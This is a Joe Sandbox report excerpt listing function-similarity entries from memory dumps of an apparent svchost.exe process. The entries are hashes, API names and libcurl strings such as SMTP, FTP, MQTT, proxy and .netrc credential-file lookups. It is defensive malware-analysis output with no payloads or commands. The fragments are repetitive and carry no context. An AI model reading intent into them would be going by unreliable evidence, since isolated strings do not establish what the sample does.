                                                                                                                                                                                • String ID: %s: %s$-----BEGIN CERTIFICATE-----$Failed extracting certificate chain$Signature
                                                                                                                                                                                • API String ID: 4200051289-995577734
                                                                                                                                                                                • Opcode ID: fd7740028ef5a7df0262f4c2deb4b905a69513d4e060cd55740582f1129d944c
                                                                                                                                                                                • Instruction ID: 113d7a32661b0dfc5311678ec828665415e68a14dffebcd7e0f0d932965051e4
                                                                                                                                                                                • Opcode Fuzzy Hash: fd7740028ef5a7df0262f4c2deb4b905a69513d4e060cd55740582f1129d944c
                                                                                                                                                                                • Instruction Fuzzy Hash: 3F416222B0878782FB109B6DD8945FA6761BB4C7D8F480031DF0D5765AEF6CE54A8748
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strdupfreestrpbrk
                                                                                                                                                                                • String ID: RCPT$RCPT TO:<%s>$RCPT TO:<%s@%s>$state change from %s to %s
                                                                                                                                                                                • API String ID: 1812939018-3816964346
                                                                                                                                                                                • Opcode ID: a2c051ca99bfe0404643eb6591755f39d13170e1d9297bfcdf4149bce0d61fbf
                                                                                                                                                                                • Instruction ID: da789869a95f419e005f7a4b10ea70c3a3ae24cc72ef594c3fa3b82afb244932
                                                                                                                                                                                • Opcode Fuzzy Hash: a2c051ca99bfe0404643eb6591755f39d13170e1d9297bfcdf4149bce0d61fbf
                                                                                                                                                                                • Instruction Fuzzy Hash: 61315C22A09B8682EB11CF19E8402B967A0FB8DBD4F4D4236EB9D13795DF3CE446C754
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Init2_inflate$Versionzlib
                                                                                                                                                                                • String ID: 1.2.0.4$1.3.1$Error while processing content unencoding: %s$Error while processing content unencoding: Unknown failure within decompression software.
                                                                                                                                                                                • API String ID: 302536580-782595508
                                                                                                                                                                                • Opcode ID: 6d02a5b57e79bd2b6441cab954cbd7bafaff07823022a6cee874a41f46a59598
                                                                                                                                                                                • Instruction ID: b8b9596b2d1aa9fcab16551e63f9dcb32216bde12cc7a180eb10ebbe1a0f3c23
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d02a5b57e79bd2b6441cab954cbd7bafaff07823022a6cee874a41f46a59598
                                                                                                                                                                                • Instruction Fuzzy Hash: C3214F62A1CA8182E7A08B5DF84026A7761FB48BC0F885131DB5E57795DF2CE59BC708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast_errno
                                                                                                                                                                                • String ID: Unknown error %lu (0x%08lX)
                                                                                                                                                                                • API String ID: 3939687465-1512744739
                                                                                                                                                                                • Opcode ID: e0fd390ba089cc533184cd5e9edb31dfcd83ef54fe4a6f94c88aea16e1fa7b0b
                                                                                                                                                                                • Instruction ID: 42d3c9887904efc72c2d49a2f0256dca1b2cc6638ba4d08a368b4f19e94ae8ef
                                                                                                                                                                                • Opcode Fuzzy Hash: e0fd390ba089cc533184cd5e9edb31dfcd83ef54fe4a6f94c88aea16e1fa7b0b
                                                                                                                                                                                • Instruction Fuzzy Hash: 6B114832A08B5686E6105F2AA80412EB7A1BB8CBC5F4C4434EF4E53755DF7DE4868B48
                                                                                                                                                                                APIs
                                                                                                                                                                                • strchr.VCRUNTIME140(?,?,?,?,?,?,00000000,?,?,00007FF8B8363E76), ref: 00007FF8B838E9BF
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,00007FF8B8363E76), ref: 00007FF8B838EBD8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: freestrchr
                                                                                                                                                                                • String ID: %s%s%s:%d$CONNECT$Host$Keep-Alive$Proxy-Connection$User-Agent
                                                                                                                                                                                • API String ID: 3117412158-3503046744
                                                                                                                                                                                • Opcode ID: 0eeff03cba9503711ba6732022194c8a6931da9088690e0495b7f41799834828
                                                                                                                                                                                • Instruction ID: 0a19ef43f4a68545a5ab372ded7d19b10e87a5c8d374aaeb3fe8a5fec1d8b50d
                                                                                                                                                                                • Opcode Fuzzy Hash: 0eeff03cba9503711ba6732022194c8a6931da9088690e0495b7f41799834828
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C718F61B0D68281EB619B59A4903B967A4FF88BD4F084032DF9D47786EF3CE546C748
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID: ???$ABOR$Failure sending ABOR command: %s$Remembering we are in dir "%s"$[%s] closing DATA connection$control connection looks dead
                                                                                                                                                                                • API String ID: 1294909896-4089852121
                                                                                                                                                                                • Opcode ID: f02c8c5bf41e36c5a23e0bf62cf56a221a29ddf5d3662b5fbc8d89f5c073f4b3
                                                                                                                                                                                • Instruction ID: a0ad596b6e6850492228ab94aad3efdf7e7c8b5a4f543132b6fc535a78b64fe1
                                                                                                                                                                                • Opcode Fuzzy Hash: f02c8c5bf41e36c5a23e0bf62cf56a221a29ddf5d3662b5fbc8d89f5c073f4b3
                                                                                                                                                                                • Instruction Fuzzy Hash: 5B61BF26A0D68285EB719B2995507FE2AA0EB4D7E8F4C0131DB5D0B6C6CF3CE5878349
                                                                                                                                                                                APIs
                                                                                                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF8B8396796), ref: 00007FF8B8396D6A
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF8B8396796), ref: 00007FF8B8396DFE
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF8B8396796), ref: 00007FF8B8396E09
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$malloc
                                                                                                                                                                                • String ID: No MQTT topic found. Forgot to URL encode it?$Too long MQTT topic
                                                                                                                                                                                • API String ID: 2190258309-1276830682
                                                                                                                                                                                • Opcode ID: edd40eb49867f9c81253b1fb1b410cb28e8baafacd2812c0aa82097c18265c91
                                                                                                                                                                                • Instruction ID: 79100a2285b6c99c0d5976b72b30265fff03a44d0b308ced57349b2cd3dbc3fc
                                                                                                                                                                                • Opcode Fuzzy Hash: edd40eb49867f9c81253b1fb1b410cb28e8baafacd2812c0aa82097c18265c91
                                                                                                                                                                                • Instruction Fuzzy Hash: C741F162A0D78682EB019B19E8402BA6B94EB59BD4F484132EF4E07796EF2CD587C704
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID: WARNING: failed to save cookies in %s: %s
                                                                                                                                                                                • API String ID: 1294909896-2898896358
                                                                                                                                                                                • Opcode ID: 498d975738ba41f0b482ce89f5673b65140e128b9d6ab8680083de960ccecc04
                                                                                                                                                                                • Instruction ID: dec600a2c0515144593f7b3ff7c624fd1b9345d05fc72eb760eaa38a0fbe7679
                                                                                                                                                                                • Opcode Fuzzy Hash: 498d975738ba41f0b482ce89f5673b65140e128b9d6ab8680083de960ccecc04
                                                                                                                                                                                • Instruction Fuzzy Hash: 1A312C6AA09A42C2EA509F5AE85477927A0FB4CFD9F1C4031CF4D07795DF3CD8468758
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00007FF8B8381BF0: realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B8381C18
                                                                                                                                                                                  • Part of subcall function 00007FF8B8381BF0: GetEnvironmentVariableA.KERNEL32 ref: 00007FF8B8381C3E
                                                                                                                                                                                  • Part of subcall function 00007FF8B8381BF0: realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B8381C5F
                                                                                                                                                                                  • Part of subcall function 00007FF8B8381BF0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B8381C70
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00007FF8B839BDA0
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00007FF8B839BDDF
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00007FF8B839BDE8
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00007FF8B839BDF3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$realloc$EnvironmentVariable
                                                                                                                                                                                • String ID: %s%s.netrc$%s%s_netrc$HOME$USERPROFILE
                                                                                                                                                                                • API String ID: 4174189579-2359381187
                                                                                                                                                                                • Opcode ID: 5f6798695357e088bd12b90659932c930415b2732f0b1a07a45d11e74d2a63fc
                                                                                                                                                                                • Instruction ID: a01b225726a08994784a349756806628e97de6e59a4d40d813d82a6b31d99fd4
                                                                                                                                                                                • Opcode Fuzzy Hash: 5f6798695357e088bd12b90659932c930415b2732f0b1a07a45d11e74d2a63fc
                                                                                                                                                                                • Instruction Fuzzy Hash: 1321B021E1E65282EA519F5EB8101B962A56F4CFD4F4C0431EF0E477A2EF7CE8038788
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                • Opcode ID: 4036a37aa70887fa240856060b7b4bd62a9322545ea0640650660116ed314ece
                                                                                                                                                                                • Instruction ID: a95b078e888b6ccd1901a1c4dace79407e147a61017ef135c64a3bb39c678cc1
                                                                                                                                                                                • Opcode Fuzzy Hash: 4036a37aa70887fa240856060b7b4bd62a9322545ea0640650660116ed314ece
                                                                                                                                                                                • Instruction Fuzzy Hash: 5B412976A09B8297EB608F2AE54016933A4FB4CBE4F584435DB8D03A51CF3CF5A28758
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                • Opcode ID: 66530e56d2662dcfe09ec54a968a0c54bee86d0c30b353ee1dd8263e646e9026
                                                                                                                                                                                • Instruction ID: 2fa01787305fdfd307d7bae6553e932c2af49a886158b3608f4bc52f9d42de68
                                                                                                                                                                                • Opcode Fuzzy Hash: 66530e56d2662dcfe09ec54a968a0c54bee86d0c30b353ee1dd8263e646e9026
                                                                                                                                                                                • Instruction Fuzzy Hash: 4301D426A15942C3D7949FAAEC540282370FB8CFAEF181031CF2E46224CF2CD896C754
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: freemallocmemmove
                                                                                                                                                                                • String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
                                                                                                                                                                                • API String ID: 2537350866-3891197721
                                                                                                                                                                                • Opcode ID: c3f5daa547b36149538014d5761113904bdf6876fb98d041a1969bd1a272c1ae
                                                                                                                                                                                • Instruction ID: b56e3eeecaee129a93123061db2c8f53efbca5905729e270b265611cf9a9a6d2
                                                                                                                                                                                • Opcode Fuzzy Hash: c3f5daa547b36149538014d5761113904bdf6876fb98d041a1969bd1a272c1ae
                                                                                                                                                                                • Instruction Fuzzy Hash: 1A718D72B08B018EEB10DFA9D4446AD33A5AB48BE8F484235DF2D67BD5DF38A416C744
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID: Digest$stale$true
                                                                                                                                                                                • API String ID: 1294909896-2487968700
                                                                                                                                                                                • Opcode ID: 142a4777d713c8f76da84790bd5537b09fd446b6a4197932a694800c3c7cf88e
                                                                                                                                                                                • Instruction ID: b6bb0957328d25d747fa37e3c448d68fb152f56e27f7872aa5c22e6792a2d001
                                                                                                                                                                                • Opcode Fuzzy Hash: 142a4777d713c8f76da84790bd5537b09fd446b6a4197932a694800c3c7cf88e
                                                                                                                                                                                • Instruction Fuzzy Hash: 7351BD62A0DA868AEB608B2DA8503B973A1EB4D7D4F4C4131DB9D436C5DF3CE557C708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Sleep_amsg_exit
                                                                                                                                                                                • String ID: *h
                                                                                                                                                                                • API String ID: 1015461914-2503545728
                                                                                                                                                                                • Opcode ID: d71459b7e88d01f4bf183fdd78d36db14fdc43101005de96b340a8d435ed0a17
                                                                                                                                                                                • Instruction ID: bc10db7b8ab239d922cef09c0acd2a62a0b9178dccc3a2cd58c18541aecdeb8b
                                                                                                                                                                                • Opcode Fuzzy Hash: d71459b7e88d01f4bf183fdd78d36db14fdc43101005de96b340a8d435ed0a17
                                                                                                                                                                                • Instruction Fuzzy Hash: A941BF7271166AC5EF058B1BE96075922A2B744F99F888526CE3C873D4EF79C8D5C300
                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualQuery.KERNEL32 ref: 6828CC34
                                                                                                                                                                                • VirtualProtect.KERNEL32 ref: 6828CC6D
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 6828CC9F
                                                                                                                                                                                  • Part of subcall function 6828CB10: __iob_func.MSVCRT ref: 6828CB32
                                                                                                                                                                                  • Part of subcall function 6828CB10: fwrite.MSVCRT ref: 6828CB4D
                                                                                                                                                                                  • Part of subcall function 6828CB10: __iob_func.MSVCRT ref: 6828CB57
                                                                                                                                                                                  • Part of subcall function 6828CB10: vfprintf.MSVCRT ref: 6828CB66
                                                                                                                                                                                  • Part of subcall function 6828CB10: abort.MSVCRT(?,?,?,?,-6829EEC8,00000000,6828CCB3,?,?,?,?,6829BD28,?,?,?,6829BD30), ref: 6828CB6B
                                                                                                                                                                                • VirtualQuery.KERNEL32(?,?,?,?,?,682960F4,?,?,?,?,?,?,68281315), ref: 6828CE94
                                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,682960F4,?,?,?,?,?,?,68281315), ref: 6828CEB6
                                                                                                                                                                                Strings
